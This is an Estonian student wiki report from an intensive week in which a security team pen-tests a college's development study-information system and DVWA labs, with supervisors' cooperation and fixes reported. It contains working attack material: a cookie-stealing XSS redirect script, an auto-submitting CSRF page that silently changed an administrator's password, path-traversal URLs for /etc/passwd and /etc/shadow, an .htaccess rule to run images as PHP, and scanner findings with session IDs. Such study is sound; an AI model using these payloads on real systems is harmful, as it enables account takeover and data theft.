Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Arvamused intensiivõppe nädala kohta ==

Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.

Urmo: Intensiivõppe nädalaga sai õpitud nii mõndagi huvitavat veebiturve ja selle testimise kohta. Kuna aega oli vähe, siis sai hulgaliselt kogemust ja oskust reaalselt planeerida mahukat tööd täiesti nullist kuni reaalse rakendatava tulemuseni ning pani proovile stressitaluvuse tõestamaks pinge all jätkusuutlikku töötamist. Intensiivõppe nädalal võiksid osaleda kõik, kellel väheke tahtmist midagi uurida ja korda saata ning saada reaalset töökogemust ennem töömaailma sukeldumist.

== Tegijad ==
Alo Konno A21

Urmo Lihten A21

Taavi Podžuks A22

Matis Alliksoo A22

Sander Saarm A22

== Juhendajad ==
Mart Mangus

Margus Ernits

Valter Kungla

Security team

2012-03-30T20:49:40Z

Ulihten: /* Väike upload tegevus, mis võiks olla teisiti */

== 1. päev - Materjalidega tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

A1: Injection - Urmo
A2: Cross-Site Scripting (XSS) - Alo
A3: Broken Authentication and Session Management - Sander
A4: Insecure Direct Object References - Alo
A5: Cross-Site Request Forgery (CSRF) - Taavi
A6: Security Misconfiguration - Matis
A7: Insecure Cryptographic Storage - Matis
A8: Failure to Restrict URL Access - Urmo
A9: Insufficient Transport Layer Protection - Taavi
A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] <br>
Taavi esitlus [[Media:A9.pdf]] <br>
Taavi esitlus [[Media:A5.pdf]] <br>
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] <br>
Matise esitlus [[Media:Security Misconfiguration.pdf]] <br>
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] <br>

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
1.1 Tutvuda OWASP’iga.
1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
2.1 Esitada tiimi tegevusplaan.
2.2 Tutvuda turvariskidega natuke põhjalikumalt.
2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
2.4 Täiendada esimese päeva ettekannet.
3. Päev
3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
3.2 Saadud tulemuste dokumenteerimine.
4. Päev
4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===

http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.
Antud programm võimaldab skännida:
Cross-Site Scripting (XSS)
SQL Injection (blind test)
File inclusion
Code Execution
LDAP Injection
Cross Frame Scripting
SQL Injection (error msg. test)
CRLF Injection
Directory Travelsal
XPath Injection
URL Redirection
Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".
Määrata ära tuli ka, et mitu päringut sekundis tehakse.
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.
Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.
Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev ==

=== Alo tegevus ===
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.<br>
Faile saab alla laadida enda profiili all õppesooritustes.<br>
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.<br>
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.<br>
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.<br>
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.<br>
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.<br>

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
====Burp suite====

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

====Nessuse algkäivitamine====
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===

====Väike upload tegevus, mis võiks olla teisiti====
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.
Proovisime üles laadida:
<li>filmi
<li>exe
<li>jpm faile
<br>kõik läks läbi ja sai uploadida.
<br>Sellises kohas võiks olla süsteem tehtud <b>whitelisti</b> põhimõttel,
<br>et lubatud oleks ainult:
<li>.doc
<li>.docx
<li>.pdf

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
